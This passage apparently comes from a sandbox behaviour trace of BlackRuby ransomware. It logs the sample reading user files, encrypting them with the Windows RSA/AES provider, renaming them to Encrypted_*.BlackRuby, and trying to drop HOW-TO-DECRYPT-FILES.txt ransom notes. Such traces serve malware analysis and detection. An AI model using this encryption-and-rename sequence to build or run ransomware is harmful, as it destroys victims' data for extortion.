lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_JeWcXR9T6SvVp0UM1vXlVKnsyGQoIF983U0kxpjM.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_jewcxr9t6svvp0um1vxlvknsygqoif983u0kxpjm.blackruby")) returned 1 [0050.839] GetLastError () returned 0xb7 [0050.839] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.839] GetLastError () returned 0xb7 [0050.839] SetErrorMode (uMode=0x1) returned 0x0 [0050.839] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.839] GetLastError () returned 0x5 [0050.841] SetErrorMode (uMode=0x0) returned 0x1 [0050.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", lpFilePart=0x0) returned 0x36 [0050.841] GetLastError () returned 0x5 [0050.841] SetErrorMode (uMode=0x1) returned 0x0 [0050.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ii6saoym hmiy_jfp.png"), fInfoLevelId=0x0, lpFileInformation=0x1cd8058 | out: lpFileInformation=0x1cd8058*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5bd77a60, ftCreationTime.dwHighDateTime=0x1d35635, ftLastAccessTime.dwLowDateTime=0xe5c8c220, ftLastAccessTime.dwHighDateTime=0x1d34e3c, ftLastWriteTime.dwLowDateTime=0xe5c8c220, ftLastWriteTime.dwHighDateTime=0x1d34e3c, nFileSizeHigh=0x0, nFileSizeLow=0x1127f)) returned 1 [0050.841] GetLastError () returned 0x5 [0050.841] SetErrorMode (uMode=0x0) returned 0x1 [0050.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", lpFilePart=0x0) returned 0x36 [0050.842] GetLastError () returned 0x5 [0050.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", lpFilePart=0x0) returned 0x36 [0050.842] GetLastError () returned 0x5 [0050.842] SetErrorMode (uMode=0x1) returned 0x0 [0050.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ii6saoym hmiy_jfp.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.842] GetLastError () returned 0x0 [0050.842] GetFileType (hFile=0x184) returned 0x1 [0050.842] SetErrorMode (uMode=0x0) returned 0x1 [0050.842] GetFileType (hFile=0x184) returned 0x1 [0050.842] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1127f [0050.842] GetLastError () returned 0x0 [0050.842] ReadFile (in: hFile=0x184, lpBuffer=0x1cd9c40, nNumberOfBytesToRead=0x1127f, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1cd9c40*, lpNumberOfBytesRead=0x18ed18*=0x1127f, lpOverlapped=0x0) returned 1 [0050.843] GetLastError () returned 0x0 [0050.843] CloseHandle (hObject=0x184) returned 1 [0050.843] GetLastError () returned 0x0 [0050.843] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", lpFilePart=0x0) returned 0x36 [0050.843] GetLastError () returned 0x0 [0050.843] SetErrorMode (uMode=0x1) returned 0x0 [0050.843] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ii6saoym hmiy_jfp.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5bd77a60, ftCreationTime.dwHighDateTime=0x1d35635, ftLastAccessTime.dwLowDateTime=0xe5c8c220, ftLastAccessTime.dwHighDateTime=0x1d34e3c, ftLastWriteTime.dwLowDateTime=0xe5c8c220, ftLastWriteTime.dwHighDateTime=0x1d34e3c, nFileSizeHigh=0x0, nFileSizeLow=0x1127f)) returned 1 [0050.844] GetLastError () returned 0x0 [0050.844] SetErrorMode (uMode=0x0) returned 0x1 [0050.844] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c4e8) returned 1 [0050.844] GetLastError () returned 0x0 [0050.879] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b68270, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360a20) returned 1 [0050.879] GetLastError () returned 0x0 [0050.879] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.879] GetLastError () returned 0x0 [0050.884] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.884] GetLastError () returned 0x0 [0050.884] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360e20) returned 1 [0050.884] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.884] GetLastError () returned 0x0 [0050.884] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b952bc*=0x1, dwFlags=0x0) returned 1 [0050.884] GetLastError () returned 0x0 [0050.884] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b95288, dwFlags=0x0) returned 1 [0050.884] GetLastError () returned 0x0 [0050.884] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b95304*, pdwDataLen=0x18ed08*=0x11370, dwBufLen=0x11370 | out: pbData=0x1b95304*, pdwDataLen=0x18ed08*=0x11370) returned 1 [0050.885] GetLastError () returned 0x0 [0050.885] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb7a10*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bb7a10*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.885] GetLastError () returned 0x0 [0050.885] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb7a40*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bb7a40*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.885] GetLastError () returned 0x0 [0050.886] CryptDestroyKey (hKey=0x360a20) returned 1 [0050.886] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.886] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0050.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", lpFilePart=0x0) returned 0x36 [0050.886] GetLastError () returned 0x0 [0050.886] SetErrorMode (uMode=0x1) returned 0x0 [0050.886] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ii6saoym hmiy_jfp.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.887] GetLastError () returned 0xb7 [0050.887] GetFileType (hFile=0x184) returned 0x1 [0050.887] SetErrorMode (uMode=0x0) returned 0x1 [0050.887] GetFileType (hFile=0x184) returned 0x1 [0050.889] CloseHandle (hObject=0x184) returned 1 [0050.889] GetLastError () returned 0xb7 [0050.889] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png", lpFilePart=0x0) returned 0x36 [0050.889] GetLastError () returned 0xb7 [0050.889] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_i9jOeAfKcVdoderfIKLkCr3LcAixNn69PjnABP.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_i9jOeAfKcVdoderfIKLkCr3LcAixNn69PjnABP.BlackRuby", lpFilePart=0x0) returned 0x5b [0050.889] GetLastError () returned 0xb7 [0050.890] SetErrorMode (uMode=0x1) returned 0x0 [0050.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ii6saoym hmiy_jfp.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5bd77a60, ftCreationTime.dwHighDateTime=0x1d35635, ftLastAccessTime.dwLowDateTime=0xe5c8c220, ftLastAccessTime.dwHighDateTime=0x1d34e3c, ftLastWriteTime.dwLowDateTime=0x2687f6a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11380)) returned 1 [0050.890] GetLastError () returned 0xb7 [0050.890] SetErrorMode (uMode=0x0) returned 0x1 [0050.890] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Ii6sAOyM HMiY_jFP.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ii6saoym hmiy_jfp.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_i9jOeAfKcVdoderfIKLkCr3LcAixNn69PjnABP.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_i9joeafkcvdoderfiklkcr3lcaixnn69pjnabp.blackruby")) returned 1 [0050.890] GetLastError () returned 0xb7 [0050.890] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.890] GetLastError () returned 0xb7 [0050.891] SetErrorMode (uMode=0x1) returned 0x0 [0050.891] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.891] GetLastError () returned 0x5 [0050.891] SetErrorMode (uMode=0x0) returned 0x1 [0050.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", lpFilePart=0x0) returned 0x2b [0050.892] GetLastError () returned 0x5 [0050.892] SetErrorMode (uMode=0x1) returned 0x0 [0050.892] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jpv1b_.flv"), fInfoLevelId=0x0, lpFileInformation=0x1be60c0 | out: lpFileInformation=0x1be60c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74c20960, ftCreationTime.dwHighDateTime=0x1d350c1, ftLastAccessTime.dwLowDateTime=0xf2aa1ad0, ftLastAccessTime.dwHighDateTime=0x1d350c5, ftLastWriteTime.dwLowDateTime=0xf2aa1ad0, ftLastWriteTime.dwHighDateTime=0x1d350c5, nFileSizeHigh=0x0, nFileSizeLow=0xfbcd)) returned 1 [0050.892] GetLastError () returned 0x5 [0050.892] SetErrorMode (uMode=0x0) returned 0x1 [0050.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", lpFilePart=0x0) returned 0x2b [0050.892] GetLastError () returned 0x5 [0050.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", lpFilePart=0x0) returned 0x2b [0050.892] GetLastError () returned 0x5 [0050.892] SetErrorMode (uMode=0x1) returned 0x0 [0050.892] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jpv1b_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.892] GetLastError () returned 0x0 [0050.892] GetFileType (hFile=0x184) returned 0x1 [0050.893] SetErrorMode (uMode=0x0) returned 0x1 [0050.893] GetFileType (hFile=0x184) returned 0x1 [0050.893] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xfbcd [0050.893] GetLastError () returned 0x0 [0050.893] ReadFile (in: hFile=0x184, lpBuffer=0x1be7d3c, nNumberOfBytesToRead=0xfbcd, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1be7d3c*, lpNumberOfBytesRead=0x18ed18*=0xfbcd, lpOverlapped=0x0) returned 1 [0050.894] GetLastError () returned 0x0 [0050.894] CloseHandle (hObject=0x184) returned 1 [0050.894] GetLastError () returned 0x0 [0050.894] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", lpFilePart=0x0) returned 0x2b [0050.894] GetLastError () returned 0x0 [0050.894] SetErrorMode (uMode=0x1) returned 0x0 [0050.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jpv1b_.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74c20960, ftCreationTime.dwHighDateTime=0x1d350c1, ftLastAccessTime.dwLowDateTime=0xf2aa1ad0, ftLastAccessTime.dwHighDateTime=0x1d350c5, ftLastWriteTime.dwLowDateTime=0xf2aa1ad0, ftLastWriteTime.dwHighDateTime=0x1d350c5, nFileSizeHigh=0x0, nFileSizeLow=0xfbcd)) returned 1 [0050.894] GetLastError () returned 0x0 [0050.894] SetErrorMode (uMode=0x0) returned 0x1 [0050.894] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0050.894] GetLastError () returned 0x0 [0050.928] CryptImportKey (in: hProv=0x37c790, pbData=0x1c61878, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0050.928] GetLastError () returned 0x0 [0050.928] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.928] GetLastError () returned 0x0 [0050.933] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.933] GetLastError () returned 0x0 [0050.933] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360da0) returned 1 [0050.933] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.933] GetLastError () returned 0x0 [0050.933] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1c8e8c4*=0x1, dwFlags=0x0) returned 1 [0050.933] GetLastError () returned 0x0 [0050.933] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1c8e890, dwFlags=0x0) returned 1 [0050.933] GetLastError () returned 0x0 [0050.933] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8e90c*, pdwDataLen=0x18ed08*=0xfcc0, dwBufLen=0xfcc0 | out: pbData=0x1c8e90c*, pdwDataLen=0x18ed08*=0xfcc0) returned 1 [0050.934] GetLastError () returned 0x0 [0050.934] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cae2b8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cae2b8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.934] GetLastError () returned 0x0 [0050.934] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cae2e8*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cae2e8*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.934] GetLastError () returned 0x0 [0050.935] CryptDestroyKey (hKey=0x360ea0) returned 1 [0050.935] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.935] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.935] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", lpFilePart=0x0) returned 0x2b [0050.935] GetLastError () returned 0x0 [0050.935] SetErrorMode (uMode=0x1) returned 0x0 [0050.935] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jpv1b_.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.936] GetLastError () returned 0xb7 [0050.936] GetFileType (hFile=0x184) returned 0x1 [0050.936] SetErrorMode (uMode=0x0) returned 0x1 [0050.936] GetFileType (hFile=0x184) returned 0x1 [0050.939] CloseHandle (hObject=0x184) returned 1 [0050.939] GetLastError () returned 0xb7 [0050.939] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv", lpFilePart=0x0) returned 0x2b [0050.939] GetLastError () returned 0xb7 [0050.939] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_CABqhOG8qvo9PlD0M3k8eV4W0KkM84gTzjWM8.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_CABqhOG8qvo9PlD0M3k8eV4W0KkM84gTzjWM8.BlackRuby", lpFilePart=0x0) returned 0x5a [0050.939] GetLastError () returned 0xb7 [0050.939] SetErrorMode (uMode=0x1) returned 0x0 [0050.939] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jpv1b_.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74c20960, ftCreationTime.dwHighDateTime=0x1d350c1, ftLastAccessTime.dwLowDateTime=0xf2aa1ad0, ftLastAccessTime.dwHighDateTime=0x1d350c5, ftLastWriteTime.dwLowDateTime=0x26917c20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xfcd0)) returned 1 [0050.939] GetLastError () returned 0xb7 [0050.939] SetErrorMode (uMode=0x0) returned 0x1 [0050.939] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\JpV1B_.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jpv1b_.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_CABqhOG8qvo9PlD0M3k8eV4W0KkM84gTzjWM8.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_cabqhog8qvo9pld0m3k8ev4w0kkm84gtzjwm8.blackruby")) returned 1 [0050.940] GetLastError () returned 0xb7 [0050.940] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.940] GetLastError () returned 0xb7 [0050.940] SetErrorMode (uMode=0x1) returned 0x0 [0050.940] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.940] GetLastError () returned 0x5 [0050.941] SetErrorMode (uMode=0x0) returned 0x1 [0050.941] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", lpFilePart=0x0) returned 0x2a [0050.941] GetLastError () returned 0x5 [0050.941] SetErrorMode (uMode=0x1) returned 0x0 [0050.941] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kbxkv.png"), fInfoLevelId=0x0, lpFileInformation=0x1cdb25c | out: lpFileInformation=0x1cdb25c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20ab5d50, ftCreationTime.dwHighDateTime=0x1d352eb, ftLastAccessTime.dwLowDateTime=0x3e887df0, ftLastAccessTime.dwHighDateTime=0x1d352e4, ftLastWriteTime.dwLowDateTime=0x3e887df0, ftLastWriteTime.dwHighDateTime=0x1d352e4, nFileSizeHigh=0x0, nFileSizeLow=0x3c12)) returned 1 [0050.941] GetLastError () returned 0x5 [0050.941] SetErrorMode (uMode=0x0) returned 0x1 [0050.941] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", lpFilePart=0x0) returned 0x2a [0050.941] GetLastError () returned 0x5 [0050.942] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", lpFilePart=0x0) returned 0x2a [0050.942] GetLastError () returned 0x5 [0050.942] SetErrorMode (uMode=0x1) returned 0x0 [0050.942] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kbxkv.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.942] GetLastError () returned 0x0 [0050.942] GetFileType (hFile=0x184) returned 0x1 [0050.942] SetErrorMode (uMode=0x0) returned 0x1 [0050.942] GetFileType (hFile=0x184) returned 0x1 [0050.942] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x3c12 [0050.942] GetLastError () returned 0x0 [0050.942] ReadFile (in: hFile=0x184, lpBuffer=0x1cdd084, nNumberOfBytesToRead=0x3c12, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1cdd084*, lpNumberOfBytesRead=0x18ed18*=0x3c12, lpOverlapped=0x0) returned 1 [0050.943] GetLastError () returned 0x0 [0050.943] CloseHandle (hObject=0x184) returned 1 [0050.943] GetLastError () returned 0x0 [0050.943] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png", lpFilePart=0x0) returned 0x2a [0050.943] GetLastError () returned 0x0 [0050.943] SetErrorMode (uMode=0x1) returned 0x0 [0050.943] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\kbxkv.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kbxkv.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20ab5d50, ftCreationTime.dwHighDateTime=0x1d352eb, ftLastAccessTime.dwLowDateTime=0x3e887df0, ftLastAccessTime.dwHighDateTime=0x1d352e4, ftLastWriteTime.dwLowDateTime=0x3e887df0, ftLastWriteTime.dwHighDateTime=0x1d352e4, nFileSizeHigh=0x0, nFileSizeLow=0x3c12)) returned 1 [0050.943] GetLastError () returned 0x0 [0050.943] SetErrorMode (uMode=0x0) returned 0x1 [0050.954] CryptImportKey (in: hProv=0x37c818, pbData=0x1d3ec48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ee0) returned 1 [0050.954] GetLastError () returned 0x0 [0050.954] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.954] GetLastError () returned 0x0 [0050.985] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.985] GetLastError () returned 0x0 [0050.985] CryptDuplicateKey (in: hKey=0x360ee0, 